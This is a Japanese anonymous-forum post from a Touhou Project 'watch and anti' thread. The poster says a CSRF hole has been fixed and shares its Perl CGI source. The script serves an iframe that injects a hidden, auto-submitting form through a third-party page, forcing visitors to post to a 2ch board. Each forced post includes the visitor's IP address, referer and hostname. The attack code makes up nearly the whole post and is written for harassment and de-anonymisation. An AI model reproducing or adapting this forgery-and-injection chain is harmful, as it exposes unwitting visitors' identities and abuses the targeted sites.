東方Project総合ヲチ&アンチスレ 30

このエントリーをはてなブックマークに追加
106名無しさん@ゴーゴーゴーゴー!

びんたんのCSRFが対策されたのでソース貼っておくか

#!/usr/local/bin/perl

use strict;

my $ADDR = $ENV{REMOTE_ADDR};
my $REF = $ENV{HTTP_REFERER};
my $HOST = gethostbyaddr(pack('C4', split(/\./, $ADDR)), 2) || $ADDR;
my $key = "1336206209"; #スレキー
my $TIME = time;

print "Content-Type: text/html\n\n";
print <<EOL;
<iframe src="http://cheese.ula.cc/test/write.php?server=%22%3E%3C/form%3E%3Cform%20name=hage%20action=http://awabi.2ch.net/test/bbs.cgi%20method=post%3E%3Cinput%20name=
bbs%20value=net%3E%3Cinput%20name=time%20value=$TIME%3E%3Cinput%20name=key%20value=$key%3E%3Cinput%20name=yuki%20value=akari%3E%3Cinput%20name=FROM%20value=fusianasan%3
E%3cinput%20name%3dmail%20value%3d%3e%3Ctextarea%20name=MESSAGE%3E%83S%83%7e%83A%83%93%83%60%82%cc%8e%a9%8eE%82%cd%82%dc%82%be%82%c5%82%b7%82%a9%81%60%81%60%81%60%81%60
%81%60%81%60%81H%81H%81H%81H%81H%81H%81H%0d%0a%90%bc%83m%8b%7b%20%81%9fWfo7Kpppz2%82%e6%82%e8%0d%0a%0d%0a$ADDR $REF $HOST%3C/textarea%3E%3Cinput%20type=submit%3E%3Cscri
pt%3Edocument.hage.submit();%3C/script%3E">
EOL
   exit;